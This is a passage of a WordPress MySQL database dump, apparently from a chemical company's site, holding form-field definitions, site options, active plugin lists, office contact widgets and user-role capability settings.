INSERT INTO `wp_ninja_forms_fields` VALUES (45, 18, '_text', 4, 'a:35:{s:5:"label";s:14:"Annual Revenue";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"1";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (46, 18, '_text', 5, 'a:35:{s:5:"label";s:19:"Number of Employees";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"1";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (47, 18, '_text', 7, 'a:35:{s:5:"label";s:7:"Website";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"1";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (48, 18, '_text', 8, 'a:35:{s:5:"label";s:13:"Business Type";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"1";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"1";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:47:"Are you an OEM? Distributor? Servicing Company?";}', NULL, NULL); 
INSERT INTO `wp_ninja_forms_fields` VALUES (49, 18, '_text', 6, 'a:35:{s:5:"label";s:17:"Years in Business";s:15:"input_limit_msg";s:17:"character(s) left";s:9:"label_pos";s:5:"above";s:11:"placeholder";s:0:"";s:10:"first_name";s:0:"";s:9:"last_name";s:0:"";s:14:"user_address_1";s:0:"";s:14:"user_address_2";s:0:"";s:9:"user_city";s:0:"";s:8:"user_zip";s:0:"";s:10:"user_phone";s:0:"";s:10:"user_email";s:0:"";s:21:"user_info_field_group";s:1:"1";s:5:"email";s:1:"0";s:13:"disable_input";s:1:"0";s:3:"req";s:1:"1";s:4:"mask";s:0:"";s:11:"input_limit";s:0:"";s:16:"input_limit_type";s:4:"char";s:17:"calc_auto_include";s:1:"0";s:10:"datepicker";s:1:"0";s:10:"user_state";s:1:"0";s:16:"autocomplete_off";s:1:"0";s:8:"num_sort";s:1:"0";s:18:"default_value_type";s:0:"";s:13:"default_value";s:0:"";s:11:"admin_label";s:0:"";s:26:"user_info_field_group_name";s:0:"";s:28:"user_info_field_group_custom";s:0:"";s:5:"class";s:0:"";s:9:"show_help";s:1:"0";s:9:"help_text";s:0:"";s:9:"show_desc";s:1:"0";s:8:"desc_pos";s:4:"none";s:9:"desc_text";s:0:"";}', NULL, NULL);
#
# End of data contents of table `wp_ninja_forms_fields`
# --------------------------------------------------------

# --------------------------------------------------------
# Table: `wp_options`


#
# Delete any existing table `wp_options`
#

DROP TABLE IF EXISTS `wp_options`;


#
# Table structure of table `wp_options`
#

CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `option_value` longtext COLLATE utf8mb4_unicode_ci NOT NULL,
  `autoload` varchar(20) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`)
) ENGINE=InnoDB AUTO_INCREMENT=693328 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci ;

#
# Data contents of table `wp_options`
#
 
INSERT INTO `wp_options` VALUES (1, 'siteurl', 'https://www.miller-stephenson.com', 'yes'); 
INSERT INTO `wp_options` VALUES (2, 'home', 'https://www.miller-stephenson.com', 'yes'); 
INSERT INTO `wp_options` VALUES (3, 'blogname', 'Miller-Stephenson Chemicals', 'yes'); 
INSERT INTO `wp_options` VALUES (4, 'blogdescription', 'Since 1955', 'yes'); 
INSERT INTO `wp_options` VALUES (5, 'users_can_register', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (6, 'admin_email', 'support@mschem.com', 'yes'); 
INSERT INTO `wp_options` VALUES (7, 'start_of_week', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (8, 'use_balanceTags', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (9, 'use_smilies', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (10, 'require_name_email', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (11, 'comments_notify', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (12, 'posts_per_rss', '10', 'yes'); 
INSERT INTO `wp_options` VALUES (13, 'rss_use_excerpt', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (14, 'mailserver_url', 'mail.example.com', 'yes'); 
INSERT INTO `wp_options` VALUES (15, 'mailserver_login', 'login@example.com', 'yes'); 
INSERT INTO `wp_options` VALUES (16, 'mailserver_pass', 'password', 'yes'); 
INSERT INTO `wp_options` VALUES (17, 'mailserver_port', '110', 'yes'); 
INSERT INTO `wp_options` VALUES (18, 'default_category', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (19, 'default_comment_status', 'closed', 'yes'); 
INSERT INTO `wp_options` VALUES (20, 'default_ping_status', 'open', 'yes'); 
INSERT INTO `wp_options` VALUES (21, 'default_pingback_flag', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (22, 'posts_per_page', '10', 'yes'); 
INSERT INTO `wp_options` VALUES (23, 'date_format', 'F j, Y', 'yes'); 
INSERT INTO `wp_options` VALUES (24, 'time_format', 'g:i a', 'yes'); 
INSERT INTO `wp_options` VALUES (25, 'links_updated_date_format', 'F j, Y g:i a', 'yes'); 
INSERT INTO `wp_options` VALUES (26, 'comment_moderation', '', 'yes'); 
INSERT INTO `wp_options` VALUES (27, 'moderation_notify', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (28, 'permalink_structure', '/%postname%/', 'yes'); 
INSERT INTO `wp_options` VALUES (30, 'hack_file', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (31, 'blog_charset', 'UTF-8', 'yes'); 
INSERT INTO `wp_options` VALUES (32, 'moderation_keys', '', 'no'); 
INSERT INTO `wp_options` VALUES (33, 'active_plugins', 'a:43:{i:0;s:61:"all-404-redirect-to-homepage/all-404-redirect-to-homepage.php";i:1;s:91:"all-in-one-wp-migration-unlimited-extension/all-in-one-wp-migration-unlimited-extension.php";i:2;s:51:"all-in-one-wp-migration/all-in-one-wp-migration.php";i:3;s:21:"articles/articles.php";i:4;s:25:"bwp-minify/bwp-minify.php";i:5;s:27:"check-email/check-email.php";i:6;s:36:"contact-form-7/wp-contact-form-7.php";i:7;s:37:"disable-comments/disable-comments.php";i:8;s:59:"disable-woocommerce-reviews/disable-woocommerce-reviews.php";i:9;s:88:"disclaimer-and-notification-manager-for-authors/disclaimer-manager-multi-author-blog.php";i:10;s:33:"displayProduct/displayProduct.php";i:11;s:39:"easy-google-fonts/easy-google-fonts.php";i:12;s:53:"nextend-facebook-connect/nextend-facebook-connect.php";i:13;s:49:"nextend-google-connect/nextend-google-connect.php";i:14;s:27:"ninja-forms/ninja-forms.php";i:15;s:19:"optimus/optimus.php";i:16;s:27:"p3-profiler/p3-profiler.php";i:17;s:71:"password-strength-for-woocommerce/password-strength-for-woocommerce.php";i:18;s:43:"pc-google-analytics/pc-google-analytics.php";i:19;s:43:"product-enquiry-pro/product_enquiry_pro.php";i:20;s:47:"regenerate-thumbnails/regenerate-thumbnails.php";i:21;s:57:"reveal-ids-for-wp-admin-25/reveal-ids-for-wp-admin-25.php";i:22;s:17:"schema/schema.php";i:23;s:45:"search-and-replace/inspyde-search-replace.php";i:24;s:37:"show-hide-author/show_hide_author.php";i:25;s:38:"sidecar-decision-tree/DecisionTree.php";i:26;s:37:"social-media-widget/social-widget.php";i:27;s:58:"ultimate-social-media-plus/ultimate_social_media_icons.php";i:28;s:55:"url-builder-for-analytics/url-builder-for-analytics.php";i:29;s:47:"user-specific-content/User-Specific-Content.php";i:30;s:59:"woocommerce-category-banner/woocommerce-category-banner.php";i:31;s:47:"woocommerce-csvimport/woocommerce-csvimport.php";i:32;s:27:"woocommerce/woocommerce.php";i:33;s:27:"woosidebars/woosidebars.php";i:34;s:33:"wordpress-move/wordpress-move.php";i:35;s:40:"wordpress-seo-premium/wp-seo-premium.php";i:36;s:29:"wp-mail-smtp/wp_mail_smtp.php";i:37;s:29:"wp-site-migrate/blogvault.php";i:38;s:27:"wp-super-cache/wp-cache.php";i:39;s:33:"wp-term-images/wp-term-images.php";i:40;s:31:"wp_migration-master/migrate.php";i:41;s:37:"yith-woocommerce-ajax-search/init.php";i:42;s:45:"yith-woocommerce-tab-manager-premium/init.php";}', 'yes'); 
INSERT INTO `wp_options` VALUES (34, 'category_base', '', 'yes'); 
INSERT INTO `wp_options` VALUES (35, 'ping_sites', 'https://rpc.pingomatic.com/', 'yes'); 
INSERT INTO `wp_options` VALUES (36, 'comment_max_links', '2', 'yes'); 
INSERT INTO `wp_options` VALUES (37, 'gmt_offset', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (38, 'default_email_category', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (39, 'recently_edited', 'a:5:{i:0;s:92:"/home/notactiveddd/public_html/ms4/wp-content/plugins/sidecar-decision-tree/DecisionTree.php";i:1;s:109:"/home/notactiveddd/public_html/ms4/wp-content/plugins/url-builder-for-analytics/url-builder-for-analytics.php";i:2;s:74:"/home/notactiveddd/public_html/ms4/wp-content/plugins/smtp-mailer/main.php";i:3;s:81:"/home/notactiveddd/public_html/ms4/wp-content/plugins/comet-cache/comet-cache.php";i:4;s:89:"/home/notactiveddd/public_html/ms4/wp-content/plugins/wp-fastest-cache/wpFastestCache.php";}', 'no'); 
INSERT INTO `wp_options` VALUES (40, 'template', 'flatsome', 'yes'); 
INSERT INTO `wp_options` VALUES (41, 'stylesheet', 'flatsome', 'yes'); 
INSERT INTO `wp_options` VALUES (42, 'comment_whitelist', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (43, 'blacklist_keys', '', 'no'); 
INSERT INTO `wp_options` VALUES (44, 'comment_registration', '', 'yes'); 
INSERT INTO `wp_options` VALUES (45, 'html_type', 'text/html', 'yes'); 
INSERT INTO `wp_options` VALUES (46, 'use_trackback', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (47, 'default_role', 'subscriber', 'yes'); 
INSERT INTO `wp_options` VALUES (48, 'db_version', '37965', 'yes'); 
INSERT INTO `wp_options` VALUES (49, 'uploads_use_yearmonth_folders', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (50, 'upload_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (51, 'blog_public', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (52, 'default_link_category', '2', 'yes'); 
INSERT INTO `wp_options` VALUES (53, 'show_on_front', 'page', 'yes'); 
INSERT INTO `wp_options` VALUES (54, 'tag_base', '', 'yes'); 
INSERT INTO `wp_options` VALUES (55, 'show_avatars', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (56, 'avatar_rating', 'G', 'yes'); 
INSERT INTO `wp_options` VALUES (57, 'upload_url_path', '', 'yes'); 
INSERT INTO `wp_options` VALUES (58, 'thumbnail_size_w', '340', 'yes'); 
INSERT INTO `wp_options` VALUES (59, 'thumbnail_size_h', '340', 'yes'); 
INSERT INTO `wp_options` VALUES (60, 'thumbnail_crop', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (61, 'medium_size_w', '800', 'yes'); 
INSERT INTO `wp_options` VALUES (62, 'medium_size_h', '800', 'yes'); 
INSERT INTO `wp_options` VALUES (63, 'avatar_default', 'mystery', 'yes'); 
INSERT INTO `wp_options` VALUES (64, 'large_size_w', '1600', 'yes'); 
INSERT INTO `wp_options` VALUES (65, 'large_size_h', '1600', 'yes'); 
INSERT INTO `wp_options` VALUES (66, 'image_default_link_type', 'none', 'yes'); 
INSERT INTO `wp_options` VALUES (67, 'image_default_size', '', 'yes'); 
INSERT INTO `wp_options` VALUES (68, 'image_default_align', '', 'yes'); 
INSERT INTO `wp_options` VALUES (69, 'close_comments_for_old_posts', '', 'yes'); 
INSERT INTO `wp_options` VALUES (70, 'close_comments_days_old', '14', 'yes'); 
INSERT INTO `wp_options` VALUES (71, 'thread_comments', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (72, 'thread_comments_depth', '5', 'yes'); 
INSERT INTO `wp_options` VALUES (73, 'page_comments', '', 'yes'); 
INSERT INTO `wp_options` VALUES (74, 'comments_per_page', '50', 'yes'); 
INSERT INTO `wp_options` VALUES (75, 'default_comments_page', 'newest', 'yes'); 
INSERT INTO `wp_options` VALUES (76, 'comment_order', 'asc', 'yes'); 
INSERT INTO `wp_options` VALUES (77, 'sticky_posts', 'a:0:{}', 'yes'); 
INSERT INTO `wp_options` VALUES (78, 'widget_categories', 'a:2:{i:13;a:4:{s:5:"title";s:17:"INDUSTRY ARTICLES";s:5:"count";i:0;s:12:"hierarchical";i:0;s:8:"dropdown";i:0;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (79, 'widget_text', 'a:4:{i:1;a:0:{}i:2;a:3:{s:5:"title";s:9:"Locations";s:4:"text";s:385:"<font size=-1>\r\n<strong>CT Corporate Office</strong><BR/>\r\n55 Backus Ave.<BR/>\r\nDanbury, CT 06810-7328 <BR/>\r\n203.743.4447<BR/>\r\nFax 203.791.8702<BR/>\r\ne-mail: ctsales@mschem.com<BR/><BR/>\r\n\r\n<strong>Illinois</strong><BR/>\r\n6321 W. Dempster St. #302<BR/>\r\nMorton Grove, IL 60053 <BR/>\r\n847.966.2022 / 800.447.4866<BR/>\r\nFax 847.966.8468<BR/>\r\ne-mail: ilsales@mschem.com<BR/>\r\n</font>\r\n";s:6:"filter";b:0;}i:3;a:3:{s:5:"title";s:2:" ";s:4:"text";s:370:"<font size=-1>\r\n<strong>California</strong><BR/>\r\n12261 Foothill Blvd.<BR/>\r\nSylmar, CA 91342 <BR/>\r\n818.896.4714 / 800.771.8161<BR/>\r\nFax 818.896.6086<BR/>\r\ne-mail: casales@mschem.com<BR/><BR/>\r\n\r\n<strong>Canada</strong><BR/>\r\n280 Belfield Road<BR/>\r\nToronto, Ontario M9W 1H6 <BR/>\r\n800.307.2199<BR/>\r\nFax 416.674.2987<BR/>\r\ne-mail: canadasales@mschem.com<BR/>\r\n</font>";s:6:"filter";b:0;}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (80, 'widget_rss', 'a:2:{i:1;a:0:{}s:12:"_multiwidget";i:1;}', 'yes'); 
INSERT INTO `wp_options` VALUES (81, 'uninstall_plugins', 'a:16:{s:38:"ninja-forms/deprecated/ninja-forms.php";s:21:"ninja_forms_uninstall";s:15:"chats/chats.php";a:2:{i:0;s:5:"Chats";i:1;s:9:"uninstall";}s:37:"show-hide-author/show_hide_author.php";s:27:"show_author_after_uninstall";s:31:"stats-counter/stats_counter.php";s:20:"wpadm_stat_uninstall";s:60:"gridlist-view-for-woocommerce/woocommerce-list-grid-view.php";a:2:{i:0;s:12:"BeRocket_LGV";i:1;s:12:"deactivation";}s:27:"wp-super-cache/wp-cache.php";s:22:"wpsupercache_uninstall";s:38:"sidecar-decision-tree/DecisionTree.php";a:2:{i:0;s:12:"DecisionTree";i:1;s:12:"on_uninstall";}s:27:"table-maker/table-maker.php";a:2:{i:0;s:16:"WPSM_Table_Maker";i:1;s:8:"rollback";}s:58:"ultimate-social-media-plus/ultimate_social_media_icons.php";s:25:"sfsi_plus_Unistall_plugin";s:39:"https-redirection/https-redirection.php";s:27:"httpssrdrctn_delete_options";s:35:"wp-fastest-cache/wpFastestCache.php";a:2:{i:0;s:14:"WpFastestCache";i:1;s:9:"uninstall";}s:19:"optimus/optimus.php";a:2:{i:0;s:7:"Optimus";i:1;s:21:"handle_uninstall_hook";}s:27:"cdn-enabler/cdn-enabler.php";a:2:{i:0;s:11:"CDN_Enabler";i:1;s:21:"handle_uninstall_hook";}s:27:"autoptimize/autoptimize.php";s:21:"autoptimize_uninstall";s:29:"jch-optimize/jch-optimize.php";s:22:"jch_optimize_uninstall";s:45:"ewww-image-optimizer/ewww-image-optimizer.php";s:30:"ewww_image_optimizer_uninstall";}', 'no'); 
INSERT INTO `wp_options` VALUES (82, 'timezone_string', '', 'yes'); 
INSERT INTO `wp_options` VALUES (83, 'page_for_posts', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (84, 'page_on_front', '64', 'yes'); 
INSERT INTO `wp_options` VALUES (85, 'default_post_format', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (86, 'link_manager_enabled', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (87, 'finished_splitting_shared_terms', '1', 'yes'); 
INSERT INTO `wp_options` VALUES (88, 'site_icon', '163', 'yes'); 
INSERT INTO `wp_options` VALUES (89, 'medium_large_size_w', '768', 'yes'); 
INSERT INTO `wp_options` VALUES (90, 'medium_large_size_h', '0', 'yes'); 
INSERT INTO `wp_options` VALUES (91, 'initial_db_version', '36686', 'yes'); 
INSERT INTO `wp_options` VALUES (92, 'wp_user_roles', 'a:9:{s:13:"administrator";a:2:{s:4:"name";s:13:"Administrator";s:12:"capabilities";a:141:{s:13:"switch_themes";b:1;s:11:"edit_themes";b:1;s:16:"activate_plugins";b:1;s:12:"edit_plugins";b:1;s:10:"edit_users";b:1;s:10:"edit_files";b:1;s:14:"manage_options";b:1;s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:6:"import";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:8:"level_10";b:1;s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:12:"delete_users";b:1;s:12:"create_users";b:1;s:17:"unfiltered_upload";b:1;s:14:"edit_dashboard";b:1;s:14:"update_plugins";b:1;s:14:"delete_plugins";b:1;s:15:"install_plugins";b:1;s:13:"update_themes";b:1;s:14:"install_themes";b:1;s:11:"update_core";b:1;s:10:"list_users";b:1;s:12:"remove_users";b:1;s:13:"promote_users";b:1;s:18:"edit_theme_options";b:1;s:13:"delete_themes";b:1;s:6:"export";b:1;s:18:"manage_woocommerce";b:1;s:24:"view_woocommerce_reports";b:1;s:12:"edit_product";b:1;s:12:"read_product";b:1;s:14:"delete_product";b:1;s:13:"edit_products";b:1;s:20:"edit_others_products";b:1;s:16:"publish_products";b:1;s:21:"read_private_products";b:1;s:15:"delete_products";b:1;s:23:"delete_private_products";b:1;s:25:"delete_published_products";b:1;s:22:"delete_others_products";b:1;s:21:"edit_private_products";b:1;s:23:"edit_published_products";b:1;s:20:"manage_product_terms";b:1;s:18:"edit_product_terms";b:1;s:20:"delete_product_terms";b:1;s:20:"assign_product_terms";b:1;s:15:"edit_shop_order";b:1;s:15:"read_shop_order";b:1;s:17:"delete_shop_order";b:1;s:16:"edit_shop_orders";b:1;s:23:"edit_others_shop_orders";b:1;s:19:"publish_shop_orders";b:1;s:24:"read_private_shop_orders";b:1;s:18:"delete_shop_orders";b:1;s:26:"delete_private_shop_orders";b:1;s:28:"delete_published_shop_orders";b:1;s:25:"delete_others_shop_orders";b:1;s:24:"edit_private_shop_orders";b:1;s:26:"edit_published_shop_orders";b:1;s:23:"manage_shop_order_terms";b:1;s:21:"edit_shop_order_terms";b:1;s:23:"delete_shop_order_terms";b:1;s:23:"assign_shop_order_terms";b:1;s:16:"edit_shop_coupon";b:1;s:16:"read_shop_coupon";b:1;s:18:"delete_shop_coupon";b:1;s:17:"edit_shop_coupons";b:1;s:24:"edit_others_shop_coupons";b:1;s:20:"publish_shop_coupons";b:1;s:25:"read_private_shop_coupons";b:1;s:19:"delete_shop_coupons";b:1;s:27:"delete_private_shop_coupons";b:1;s:29:"delete_published_shop_coupons";b:1;s:26:"delete_others_shop_coupons";b:1;s:25:"edit_private_shop_coupons";b:1;s:27:"edit_published_shop_coupons";b:1;s:24:"manage_shop_coupon_terms";b:1;s:22:"edit_shop_coupon_terms";b:1;s:24:"delete_shop_coupon_terms";b:1;s:24:"assign_shop_coupon_terms";b:1;s:17:"edit_shop_webhook";b:1;s:17:"read_shop_webhook";b:1;s:19:"delete_shop_webhook";b:1;s:18:"edit_shop_webhooks";b:1;s:25:"edit_others_shop_webhooks";b:1;s:21:"publish_shop_webhooks";b:1;s:26:"read_private_shop_webhooks";b:1;s:20:"delete_shop_webhooks";b:1;s:28:"delete_private_shop_webhooks";b:1;s:30:"delete_published_shop_webhooks";b:1;s:27:"delete_others_shop_webhooks";b:1;s:26:"edit_private_shop_webhooks";b:1;s:28:"edit_published_shop_webhooks";b:1;s:25:"manage_shop_webhook_terms";b:1;s:23:"edit_shop_webhook_terms";b:1;s:25:"delete_shop_webhook_terms";b:1;s:25:"assign_shop_webhook_terms";b:1;s:16:"aiosp_manage_seo";b:1;s:13:"wplc_ma_agent";b:1;s:24:"edit_wplc_quick_response";b:1;s:30:"edit_other_wplc_quick_response";b:1;s:27:"publish_wplc_quick_response";b:1;s:24:"read_wplc_quick_response";b:1;s:32:"read_private_wplc_quick_response";b:1;s:26:"delete_wplc_quick_response";b:1;s:15:"wpseo_bulk_edit";b:1;s:21:"manage_schema_options";b:1;}}s:6:"editor";a:2:{s:4:"name";s:6:"Editor";s:12:"capabilities";a:35:{s:17:"moderate_comments";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:12:"upload_files";b:1;s:15:"unfiltered_html";b:1;s:10:"edit_posts";b:1;s:17:"edit_others_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:10:"edit_pages";b:1;s:4:"read";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:17:"edit_others_pages";b:1;s:20:"edit_published_pages";b:1;s:13:"publish_pages";b:1;s:12:"delete_pages";b:1;s:19:"delete_others_pages";b:1;s:22:"delete_published_pages";b:1;s:12:"delete_posts";b:1;s:19:"delete_others_posts";b:1;s:22:"delete_published_posts";b:1;s:20:"delete_private_posts";b:1;s:18:"edit_private_posts";b:1;s:18:"read_private_posts";b:1;s:20:"delete_private_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"read_private_pages";b:1;s:15:"wpseo_bulk_edit";b:1;}}s:6:"author";a:2:{s:4:"name";s:6:"Author";s:12:"capabilities";a:10:{s:12:"upload_files";b:1;s:10:"edit_posts";b:1;s:20:"edit_published_posts";b:1;s:13:"publish_posts";b:1;s:4:"read";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;s:22:"delete_published_posts";b:1;}}s:11:"contributor";a:2:{s:4:"name";s:11:"Contributor";s:12:"capabilities";a:5:{s:10:"edit_posts";b:1;s:4:"read";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:12:"delete_posts";b:1;}}s:10:"subscriber";a:2:{s:4:"name";s:10:"Subscriber";s:12:"capabilities";a:2:{s:4:"read";b:1;s:7:"level_0";b:1;}}s:8:"customer";a:2:{s:4:"name";s:8:"Customer";s:12:"capabilities";a:1:{s:4:"read";b:1;}}s:12:"shop_manager";a:2:{s:4:"name";s:12:"Shop Manager";s:12:"capabilities";a:110:{s:7:"level_9";b:1;s:7:"level_8";b:1;s:7:"level_7";b:1;s:7:"level_6";b:1;s:7:"level_5";b:1;s:7:"level_4";b:1;s:7:"level_3";b:1;s:7:"level_2";b:1;s:7:"level_1";b:1;s:7:"level_0";b:1;s:4:"read";b:1;s:18:"read_private_pages";b:1;s:18:"read_private_posts";b:1;s:10:"edit_users";b:1;s:10:"edit_posts";b:1;s:10:"edit_pages";b:1;s:20:"edit_published_posts";b:1;s:20:"edit_published_pages";b:1;s:18:"edit_private_pages";b:1;s:18:"edit_private_posts";b:1;s:17:"edit_others_posts";b:1;s:17:"edit_others_pages";b:1;s:13:"publish_posts";b:1;s:13:"publish_pages";b:1;s:12:"delete_posts";b:1;s:12:"delete_pages";b:1;s:20:"delete_private_pages";b:1;s:20:"delete_private_posts";b:1;s:22:"delete_published_pages";b:1;s:22:"delete_published_posts";b:1;s:19:"delete_others_posts";b:1;s:19:"delete_others_pages";b:1;s:17:"manage_categories";b:1;s:12:"manage_links";b:1;s:17:"moderate_comments";b:1;s:15:"unfiltered_html";b:1;s:12:"upload_files";b:1;s:6:"export";b:1;s:6:"import";b:1;s:10:"list_users";b:1;s:18:"manage_woocommerce";b:1;s:24:"view_woocommerce_reports";b:1;s:12:"edit_product";b:1;s:12:"read_product";b:1;s:14:"delete_product";b:1;s:13:"edit_products";b:1;s:20:"edit_others_products";b:1;s:16:"publish_products";b:1;s:21:"read_private_products";b:1;s:15:"delete_products";b:1;s:23:"delete_private_products";b:1;s:25:"delete_published_products";b:1;s:22:"delete_others_products";b:1;s:21:"edit_private_products";b:1;s:23:"edit_published_products";b:1;s:20:"manage_product_terms";b:1;s:18:"edit_product_terms";b:1;s:20:"delete_product_terms";b:1;s:20:"assign_product_terms";b:1;s:15